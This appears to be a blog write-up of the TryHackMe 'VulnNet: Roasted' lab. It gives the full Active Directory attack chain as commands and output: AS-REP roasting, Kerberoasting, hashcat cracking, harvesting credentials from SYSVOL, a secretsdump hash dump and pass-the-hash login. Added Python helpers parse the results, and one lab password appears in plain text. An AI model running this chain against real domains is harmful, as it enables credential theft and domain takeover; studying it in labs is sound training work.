
THM VulnNet Roast

VulnNet: Roasted room

I’m not familiar with how to attack a Windows machine :(

Nmap

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-04-27 04:21:48Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack Microsoft Windows RPC
49702/tcp open  msrpc         syn-ack Microsoft Windows RPC
49767/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-04-27T04:22:41
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62030/tcp): CLEAN (Timeout)
|   Check 2 (port 42522/tcp): CLEAN (Timeout)
|   Check 3 (port 38398/udp): CLEAN (Timeout)
|   Check 4 (port 24307/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

SMBMAP

  • First of all, port 445 is open, so we enumerate the shares with smbmap as the anonymous user.
smbmap -H 10.10.154.123 -u anonymous
[+] Guest session       IP: 10.10.154.123:445   Name: 10.10.154.123                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • Get all files from the two anonymously readable shares
smbclient //10.10.154.123/VulnNet-Enterprise-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> dir
  .                                   D        0  Fri Mar 12 21:46:40 2021
  ..                                  D        0  Fri Mar 12 21:46:40 2021
  Enterprise-Operations.txt           A      467  Thu Mar 11 20:24:34 2021
  Enterprise-Safety.txt               A      503  Thu Mar 11 20:24:34 2021
  Enterprise-Sync.txt                 A      496  Thu Mar 11 20:24:34 2021

                8540159 blocks of size 4096. 4296127 blocks available
smb: \> get Enterprise-Operations.txt
getting file \Enterprise-Operations.txt of size 467 as Enterprise-Operations.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Enterprise-Safety.txt
getting file \Enterprise-Safety.txt of size 503 as Enterprise-Safety.txt (0.2 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Enterprise-Sync.txt
getting file \Enterprise-Sync.txt of size 496 as Enterprise-Sync.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit

smbclient //10.10.154.123/VulnNet-Business-Anonymous -N  
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Mar 12 21:46:40 2021
  ..                                  D        0  Fri Mar 12 21:46:40 2021
  Business-Manager.txt                A      758  Thu Mar 11 20:24:34 2021
  Business-Sections.txt               A      654  Thu Mar 11 20:24:34 2021
  Business-Tracking.txt               A      471  Thu Mar 11 20:24:34 2021

                8540159 blocks of size 4096. 4296127 blocks available
smb: \> get Business-Manager.txt
getting file \Business-Manager.txt of size 758 as Business-Manager.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Business-Sections.txt
getting file \Business-Sections.txt of size 654 as Business-Sections.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Business-Tracking.txt
getting file \Business-Tracking.txt of size 471 as Business-Tracking.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
  • Nothing interesting in those files.

Impacket username enumeration

  • Read-only IPC$ for the guest session means we can bind to the LSARPC named pipe and enumerate usernames by brute-forcing RIDs with Impacket's lookupsid.py
/opt/impacket/examples/lookupsid.py anonymous@10.10.154.123  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.154.123
[*] StringBinding ncacn_np:10.10.154.123[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
  • Keeping only the (SidTypeUser) entries gives us a username list
cat user.txt 
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
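Filtering the SidTypeUser rows by hand is fine for nine accounts; the parser below, added here as an example and not part of the original writeup or of Impacket, does the same from lookupsid.py output and additionally drops the machine account (WIN-2BO8M1OE1M1$) by default, since machine passwords are long random strings that no wordlist will hit. The sample output is typed in from the listing above (constructed, not a capture); SidEntry, parse_lookupsid, user_accounts, write_userfile and the default file name user.txt are this example's own names.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample in the format lookupsid.py prints ("RID: DOMAIN\name (SidType)").
# Names and RIDs mirror the writeup; it is typed in here, not captured from the box.
SAMPLE_LOOKUPSID_OUTPUT = """\
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
500: VULNNET-RST\\Administrator (SidTypeUser)
501: VULNNET-RST\\Guest (SidTypeUser)
502: VULNNET-RST\\krbtgt (SidTypeUser)
512: VULNNET-RST\\Domain Admins (SidTypeGroup)
1000: VULNNET-RST\\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\\DnsAdmins (SidTypeAlias)
1104: VULNNET-RST\\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\\a-whitehat (SidTypeUser)
"""

# One resolved SID per line: "<rid>: <domain>\<name> (<SidType>)"
LINE_RE = re.compile(
    r"^(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


@dataclass(frozen=True)
class SidEntry:
    rid: int
    domain: str
    name: str
    kind: str  # SidTypeUser, SidTypeGroup, SidTypeAlias, ...


def parse_lookupsid(output: str) -> list[SidEntry]:
    """Parse lookupsid.py stdout; status lines ([*], [-]) are skipped."""
    entries = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append(SidEntry(int(m["rid"]), m["domain"], m["name"], m["kind"]))
    return entries


def user_accounts(entries: list[SidEntry], include_machines: bool = False) -> list[str]:
    """Names to feed GetNPUsers.py. Machine accounts (trailing '$') are dropped by
    default: their passwords are long random strings, so a roasted ticket for them
    will never crack with a wordlist."""
    return [
        e.name
        for e in entries
        if e.kind == "SidTypeUser" and (include_machines or not e.name.endswith("$"))
    ]


def write_userfile(entries: list[SidEntry], path: str = "user.txt") -> int:
    """Write one name per line for GetNPUsers.py -usersfile; returns the count."""
    names = user_accounts(entries)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    for name in user_accounts(parse_lookupsid(SAMPLE_LOOKUPSID_OUTPUT)):
        print(name)
```

Pipe real output straight in (`lookupsid.py anonymous@10.10.154.123 -no-pass > sids.txt`) and call parse_lookupsid on the file contents; RIDs of 1000 and above are the accounts the domain's admins created, which is where the roasting targets usually sit.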
  • Port 88/tcp is open (Kerberos).

⇒ Retrieve AS-REP hashes with AS-REP Roasting (https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast): for any account with "Do not require Kerberos preauthentication" set, the KDC returns an AS-REP without asking for a password, and the encrypted part of that reply is keyed with the user's password hash, so it can be cracked offline.

/opt/impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile ./user.txt -no-pass -dc-ip 10.10.154.123
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:[REDACTED]
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
  • Only t-skid has pre-authentication disabled. The KDC_ERR_CLIENT_REVOKED line is krbtgt (third name in user.txt): that account is disabled by default, so the KDC refuses it outright. Identify the hash type with name-that-hash
 name-that-hash -f hash

  _   _                           _____ _           _          _   _           _     
 | \ | |                         |_   _| |         | |        | | | |         | |    
 |  \| | __ _ _ __ ___   ___ ______| | | |__   __ _| |_ ______| |_| | __ _ ___| |__  
 | . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______|  _  |/ _` / __| '_ \ 
 | |\  | (_| | | | | | |  __/      | | | | | | (_| | |_       | | | | (_| \__ \ | | |
 \_| \_/\__,_|_| |_| |_|\___|      \_/ |_| |_|\__,_|\__|      \_| |_/\__,_|___/_| |_|

https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash 
    

$krb5asrep$23$t-skid@VULNNET-RST:[REDACTED]

Most Likely 
Kerberos 5 AS-REP etype 23, HC: 18200 JtR: krb5pa-sha1 Summary: Used for Windows Active Directory
  • Crack hash with hashcat
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

Kerberoasting

  • The password recovered from the AS-REP hash gives us a valid domain account (t-skid), which is enough to authenticate to the DC.

Any authenticated domain user can request a service ticket (TGS) for any account that has an SPN set, and that ticket is encrypted with the service account's password hash. So we use t-skid's credentials to Kerberoast, then crack the tickets offline to obtain credentials for the services that are running.

/opt/impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:********' -outputfile keberoast.hash -dc-ip 10.10.129.181
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName    Name                MemberOf                                                       PasswordLastSet             LastLogon                   Delegation 
----------------------  ------------------  -------------------------------------------------------------  --------------------------  --------------------------  ----------
CIFS/vulnnet-rst.local  enterprise-core-vn  CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local  2021-03-11 14:45:09.913979  2021-03-13 18:41:17.987528             



[-] CCache file is not found. Skipping...
  • name-that-hash identifies this one as Kerberos 5 TGS-REP etype 23 (hashcat mode 13100); crack it with hashcat
hashcat -m 13100 keberoast.hash /usr/share/wordlists/rockyou.txt                                             
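The same identification step is run twice on this page (the AS-REP hash for t-skid, then the TGS-REP hash for enterprise-core-vn), and in both cases the answer is already in the line: Impacket prefixes each hash with $krb5asrep$<etype>$ or $krb5tgs$<etype>$, and kind plus etype fixes the hashcat mode. The script below, an added example rather than code from the writeup, name-that-hash or Impacket, parses both etype 23 layouts, drops the [-] status lines and anything truncated, and groups whatever remains per hashcat mode so each group can be cracked with its own -m. The ticket bodies in the sample are constructed dummy hex (a real encrypted part is hundreds of bytes); KerberosHash, classify, triage, write_hashfiles, hashcat_commands and the <mode>.hash file names are this example's own.

```python
from __future__ import annotations

import os
import re
from dataclasses import dataclass
from typing import Optional

# hashcat -m values for the ticket formats Impacket writes out.
# AES AS-REP output (etype 17/18 from GetNPUsers.py) is deliberately not handled here.
HASHCAT_MODES = {
    ("asrep", 23): 18200,  # Kerberos 5 AS-REP etype 23 (RC4-HMAC)
    ("tgs", 23): 13100,    # Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
    ("tgs", 17): 19600,    # Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96)
    ("tgs", 18): 19700,    # Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96)
}

PREFIX_RE = re.compile(r"^\$krb5(?P<kind>asrep|tgs)\$(?P<etype>\d+)\$")
# $krb5asrep$23$user@REALM:<16-byte checksum hex>$<encrypted part hex>
ASREP23_RE = re.compile(
    r"^\$krb5asrep\$23\$(?P<user>[^@]+)@(?P<realm>[^:]+):(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
# $krb5tgs$23$*user$REALM$spn*$<16-byte checksum hex>$<encrypted part hex>
TGS23_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass(frozen=True)
class KerberosHash:
    kind: str            # "asrep" or "tgs"
    etype: int
    mode: int            # hashcat -m
    user: Optional[str]  # filled in for etype 23, where the layout is fixed
    realm: Optional[str]
    spn: Optional[str]   # TGS only


def classify(line: str) -> Optional[KerberosHash]:
    """Return what hashcat needs for one line, or None if it is not a crackable ticket."""
    line = line.strip()
    m = PREFIX_RE.match(line)
    if not m:
        return None
    kind, etype = m["kind"], int(m["etype"])
    mode = HASHCAT_MODES.get((kind, etype))
    if mode is None:
        return None
    user = realm = spn = None
    if etype == 23:
        fm = (ASREP23_RE if kind == "asrep" else TGS23_RE).match(line)
        if fm is None or len(fm["edata"]) % 2:
            # right prefix, broken body: truncated paste, stray prompt text, odd hex length
            return None
        user, realm = fm["user"], fm["realm"]
        spn = fm.groupdict().get("spn")
    return KerberosHash(kind, etype, mode, user, realm, spn)


def triage(text: str) -> dict[int, list[str]]:
    """Group crackable lines from GetNPUsers/GetUserSPNs output by hashcat mode,
    dropping [-]/[*] status lines. hashcat takes one -m per run, so mixed output
    has to be split before cracking."""
    grouped: dict[int, list[str]] = {}
    for line in text.splitlines():
        h = classify(line)
        if h is not None:
            grouped.setdefault(h.mode, []).append(line.strip())
    return grouped


def write_hashfiles(grouped: dict[int, list[str]], outdir: str = ".") -> list[str]:
    """Write <mode>.hash per group; returns the paths written."""
    paths = []
    for mode, lines in grouped.items():
        p = os.path.join(outdir, f"{mode}.hash")
        with open(p, "w", encoding="utf-8") as fh:
            fh.write("\n".join(lines) + "\n")
        paths.append(p)
    return paths


def hashcat_commands(grouped: dict[int, list[str]], wordlist: str = "/usr/share/wordlists/rockyou.txt") -> list[str]:
    """One hashcat invocation per mode, reading the files write_hashfiles() produces."""
    return [f"hashcat -m {mode} {mode}.hash {wordlist}" for mode in sorted(grouped)]


# Constructed sample: status lines copy the writeup, ticket bodies are dummy hex.
CHECKSUM = "3f9c0e1b7d2a4c6e8f1a2b3c4d5e6f70"
EDATA = "00112233445566778899aabbccddeeff" * 4
SAMPLE_OUTPUT = f"""\
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$t-skid@VULNNET-RST:{CHECKSUM}${EDATA}
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*${CHECKSUM}${EDATA}
$krb5tgs$23$*truncated$VULNNET-RST.LOCAL$cifs/dc*${CHECKSUM}$abc
"""

if __name__ == "__main__":
    for cmd in hashcat_commands(triage(SAMPLE_OUTPUT)):
        print(cmd)
```

Note the realm difference between the two lines: GetNPUsers.py echoes the realm as typed on the command line (VULNNET-RST), GetUserSPNs.py writes the ticket's own realm (VULNNET-RST.LOCAL). For etype 23 this does not matter, the key is just the NT hash of the password; for AES tickets (etype 17/18) the key is salted with realm and username, so there the realm string must be correct.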
  • enterprise-core-vn is a member of Remote Management Users (see the MemberOf column above), so its cracked password logs us in over WinRM (port 5985) with evil-winrm ==> GOT USER FLAG.

Privilege Escalation

  • Check SMB again with the credentials of enterprise-core-vn
smbmap -H 10.10.4.214 -u enterprise-core-vn -p ry=ibfkfv,s6h,
[+] IP: 10.10.4.214:445 Name: 10.10.4.214                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing

As an authenticated domain user we now have READ access to two more shares, NETLOGON and SYSVOL.

Enumerating SYSVOL, we find ResetPassword.vbs, which contains hard-coded credentials for another user.
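Rather than opening every file pulled from SYSVOL by hand, the scanner below (an added example, not code from the writeup or the room) walks a downloaded share and reports the usual credential leaks: password- or user-like variable assignments in VBS, PowerShell and batch logon scripts, net user commands with the password on the command line, and the cpassword attribute in Group Policy Preference XML. That is broader than the single ResetPassword.vbs on this page; the sample tree, its file contents and the names svc-reset, svc-backup and localadmin are constructed for the example, and the real ResetPassword.vbs is not reproduced here.

```python
from __future__ import annotations

import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# File types worth reading: logon scripts, Group Policy Preference XML, notes.
TEXT_EXT = {".vbs", ".ps1", ".bat", ".cmd", ".xml", ".ini", ".txt"}
MAX_BYTES = 1_000_000

# Each pattern yields (name, value). Order matters: the first kind to hit a line wins.
PATTERNS = [
    # cpassword="..." in Groups.xml, ScheduledTasks.xml, ... (GPP, MS14-025)
    ("gpp-cpassword", re.compile(r'(?i)\b(cpassword)="([^"]+)"')),
    # strPassword = "x", $pwd = 'x', userName="x" in VBS / PowerShell / batch / XML
    ("script-assignment", re.compile(r"(?i)\b(\w*(?:pass|pwd|user|login)\w*)\s*=\s*[\"']([^\"']+)[\"']")),
    # net user <name> <password> [/add] [/domain]
    ("net-command", re.compile(r"(?i)\bnet\s+user\s+(?!/)(\S+)\s+(?!/)(\S+)")),
]


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    kind: str
    name: str
    value: str


def scan_file(path: Path, root: Path) -> list[Finding]:
    try:
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return []
    rel = path.relative_to(root).as_posix()
    findings, seen = [], set()
    for n, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            for m in rx.finditer(line):
                key = (n, m.group(1).lower(), m.group(2))
                if key not in seen:  # cpassword also looks like a plain assignment
                    seen.add(key)
                    findings.append(Finding(rel, n, kind, m.group(1), m.group(2)))
    return findings


def scan_tree(root) -> list[Finding]:
    """Walk a downloaded share (e.g. SYSVOL) and report credential-looking lines."""
    root = Path(root)
    out: list[Finding] = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in TEXT_EXT and p.stat().st_size <= MAX_BYTES:
            out.extend(scan_file(p, root))
    return out


def build_sample_sysvol() -> Path:
    """Constructed stand-in tree in a temp dir; none of this is the real share content."""
    root = Path(tempfile.mkdtemp(prefix="sysvol-"))
    files = {
        "scripts/ResetPassword.vbs": (
            "' constructed example, not the file from the room\n"
            'Const strUserNTName = "svc-reset"\n'
            'Const strPassword = "Winter2021!"\n'
            'Set objUser = GetObject("LDAP://CN=" & strUserNTName & ",CN=Users,DC=example,DC=local")\n'
            "objUser.SetPassword strPassword\n"
        ),
        "scripts/login.bat": "@echo off\nnet use H: \\\\fileserver\\home\nnet user svc-backup Summer2021! /add /domain\n",
        "scripts/README.txt": "Password policy: 12 characters minimum.\n",
        "Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Preferences/Groups/Groups.xml": (
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<Groups><User name="localadmin"><Properties action="U" cpassword="c0nstructedBase64Blob==" '
            'userName="localadmin"/></User></Groups>\n'
        ),
    }
    for rel, content in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_sysvol()):
        print(f"{f.path}:{f.line_no} [{f.kind}] {f.name} = {f.value}")
```

Point scan_tree at the directory where `smbclient ... -c 'recurse ON; prompt OFF; mget *'` or `smbmap -R` dropped the share. A cpassword hit is as good as a plaintext password: Microsoft published the AES key that encrypts it, and MS14-025 only stopped new values from being written, so old ones still sit in SYSVOL on many domains.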

  • Check SMB again with the new user's credentials
smbmap -H 10.10.30.208 -u ******* -p *********
[+] IP: 10.10.30.208:445        Name: 10.10.30.208                                      
[\] Work[!] Unable to remove test directory at \\10.10.30.208\SYSVOL\VYGROILECB, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     Remote Admin
        C$                                                      READ, WRITE     Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ, WRITE     Logon server share 
        SYSVOL                                                  READ, WRITE     Logon server share 
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing

This user has READ, WRITE on ADMIN$ and C$, i.e. administrative access to the domain controller. Let's use these credentials to dump the domain hashes.

  • Hash dump with Impacket's secretsdump.py. The RemoteRegistry error is harmless here: it only affects the SAM/LSA part, and on a domain controller the NTDS.DIT secrets still come out via the DRSUAPI method (the same replication call DCSync uses).
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[-] RemoteOperations failed: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE(An instance of a named pipe cannot be found in the listening state.)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]
  • Log in as Administrator by passing the NT hash (evil-winrm -H takes the NT hash in place of a password)
evil-winrm -u administrator -H hash -i 10.10.86.216
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

GOT SYSTEM FLAG

This post is licensed under CC BY 4.0 by the author.